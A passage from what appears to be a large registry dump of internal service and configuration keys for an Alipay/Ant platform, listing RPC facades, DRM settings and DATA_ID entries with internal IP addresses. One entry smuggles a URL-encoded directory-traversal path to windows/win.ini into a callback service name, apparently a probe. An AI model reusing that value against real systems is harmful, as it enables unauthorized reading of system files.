mmon.service.facade.callback.ProcessCallback:1.0:http://www.baidu.com@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.strategy.SmartAntFinStrategyCalcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP-F-MOBILEPM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:asyncAsttshipcoreFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.ha.AnthaDcAlertManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_RQ_Notify_2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ifxposition.service.facade.symbol.CalendarQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:payflux@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.appclient.process.ProcessDefinitionAccessor:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedData2SyncTable4CheckDrmImpl.mainLoadNumForMainCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.metadata.common.service.tr.meta.MetaTableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.grayprod.change.drm.ChangePolicy.consultTaskInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_after2TestProcessCallback_v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FUNDPROD2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ugrowthcampaign.common.service.facade.service.FirstLoginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscharityprod.common.service.facade.mng.InsProductInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowDutyInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.38.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","_CLIENTSERVICE_TEST_6#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.feeclcn.common.service.facade.FeeResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_BOPS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.morderprod.common.service.facade.SalesProductQueryService:1.0.0:salesProductQuery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SecureQuestionErrorTimesService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iecpprod.common.service.facade.api.WalletStatusInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.181.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.link.facade.MerchantNewsLbsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:datatransfermanage@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.risk.service.RiskTestQuestionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.AssetPortfolioAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbcateringprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.item.ItemQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_HELP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.aciamcore.common.service.facade.identity.IdpConfigServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_ZM_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.custdecision.service.facade.XflushErrorV2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.drm711#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.182.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetprod.common.facade.AssetAllocationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.money.api.MoneyConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauthcore.common.service.facade.manager.ConditionManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilechat.common.service.facade.api.GroupServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dponeservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csguide.service.facade.api.GuideNodeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cxbiz.aircoreservice.core.businessservice.api.OrderApplyProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.174.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.common.service.facade.cashing.facade.CashingRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","PordApiSpecRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fcrcportal:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_DECISION_SECONDARY_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpwm.facade.sceneinvest.migrate.RollBackSyncDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.zcache.log.prodmng.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paydecision.service.api.ScientificGuidanceService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.tenant.DataProjectService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.tag.ComboTagMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.riskengine.facade.api.RiskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.common.service.facade.api.listen.CfpAccountSubscribeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.168.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantOrderQueryMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipassprod.service.facade.api.AlipassTemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerAnyCorsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.api.ShopDynamicLayoutQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@gj#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.insdataprod.common.service.facade.pet.api.PetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.common.service.facade.api.PostFacade:1.0:orgPostFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpServiceRouterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kborderprod.KopOrderReverseSerive:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.banner.BannerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.133.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@kbshopdetail#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.appstore.common.service.facade.commodity.CommodityShopOperationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alifi.naegis.service.loan.ExemptNewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.air.service.facade.RecService:1.0:recmixer_tppOuterClient@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.89.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:gfacceptance.product.ReceivableSettleProduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.McardFreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.financeprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.88.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","finriskportal@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-yebcore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinstockprod.biz.service.gw.trade.api.TradeManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivecenter.common.service.facade.api.ClcConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.BbcMetaDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bklid.facade.api.interflow.CupAmountSplitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dss.endpoint.plugin.openapi.AntqwriterMonitorOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dataphin.publishing.common.facade.publish.PublishSpi:1.0:dppipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.bizfacade.FundBizRequestMoneyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.dynamicTaskSwitchFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:imobilegmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityPackageUpdateFacadeForTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.se.LocalReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.ScenePromoOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditagreement.waitActiveCloseTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecbill.common.service.admin.EcbillToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_activityFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ipromofront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.AppInviteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbill.facade.service.PcreditBillDelayRepayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.IntimateRelationCompactFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.RefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.query.ShopRelationQueryFacadeForManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csportal.service.facade.api.TaskExceptionInfoService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_ZPROXY_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.messagefusion.inner.facade.api.TemplateInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbclaimprod.common.service.facade.ClaimVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchselfop.mrchworkbench.panama.facade.MessageTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.adjust.api.PointsAdjustDetailMngService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlink.tuling.common.service.api.np.KolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.excashier.unipayment.common.service.payment.callback.UniPaymentCallbackService:1.0:mdeduct@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.resource.ResourceOriginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.definition.OdEnumQueryOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityassistant.flow.common.service.FlowConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbstaffcenter.common.service.facade.train.TrainTargetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.finslip_finreconBatchTddlDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mmemberprod.backend.service.facade.MerchantMemberTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.StatisticInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.186.150#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.filebridge.service.facade.workbench.FileFactorySerialService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:offer.activate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finorm.finriskcenter.common.facade.api.guardian.ImmuneRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.claimoperation.common.service.InvestigationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchpromoprod.facade.activity.ActivityInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.component.lottery.ComponentLotteryRechargeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.counter.CounterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcclienttrdcenter_commonProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.common.service.facade.spi.RecoverServiceFacade:1.0:zskynet@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmng.service.facade.ctrl.DataSvnFetchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.core.service.detect.EcoIdeDataTotalDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.speech.card.SecuUserCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.drm.PreEnvScheduleTrigger.taskName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:cms-test-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:zonemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.spi.ControlBizFacade:1.0:pcpcMessageBoxReachConfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.biz.crowd.gw.FriendViewNameQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.ConditionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.migrate.drm.SceneMigrateTaskDrm.historyDataScanTaskContractLoadMaxNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findecision.test.facade.TestFindecisionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfmac@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finecorisk.common.facade.service.api.schema.ScUserGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotvilla.common.service.facade.api.manager.CacheManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:gzmsmop-sffad@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.MerchantArVisibleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.ordermng.common.service.api.merchant.MerchantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTEYE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:mybank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.userview.config.facade.RecommendQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkwirelessdataportal.common.service.codego.CodeGoNotificationServerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csvoice.service.facade.api.ClusterDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.resolutioncenter.service.facade.api.DisputeOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:customscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.LifeappChangeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.exception.CommonExceptionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fund.api.ReconChannelApiQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincoretechdss.core.service.xflushAlarm.FincoreTechDssRefreshDrmInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.OpenProfileConsistQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_etensipUpgradeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdaconfigsvr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:rmyTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.activity.ActivityMstManualDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sccore.facade.UserLoginHistoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcenter.common.dal.share.auto.daointerface.McenterRecoverDetailDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.elecomponent.EleComponentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYINTLJSESSIONID.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.account.SpAccountQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.228.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditrmp-parent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.grayPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.sync.ProductSyncItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_P_antchaos_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.247.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zdataconsole.zdal.service.ZDALOcsConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.hbase.impl.HBaseClientTimeoutConfigResource.configStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchmembercore.common.facade.KaBaoTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crsociety.api.TrServiceClassFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:charge@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.financeprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxianquery.digestquery.common.service.PolicyDigestSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.datacontext.common.service.facade.bizcontext.api.FcBizContextQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbprocess.common.service.facade.PageTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:xview-certify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financingcore.financing.facade.api.FinancingRefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.HavanaMemberQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.api.CodeApiFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.PromotionOperationOutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.geaBaseUpdateClientV2ErrorLogOnProbability,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iamlmng.biz.verify.common.interfaces.MatrixStr2EddManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.ucdp.UcdpCheckDBFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:openbizmock@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.176.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.service.facade.service.WarningDecisionConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authcenter.service.facade.OauthServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.asbi.AsbiVisualizeVipFacade:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:recnptune-biz-pay-recommend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebppprod.common.service.facade.common.EbppPublicMsgConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.businessarea.MrchProdBusinessAreaMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.CcrActivityConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.clerktone.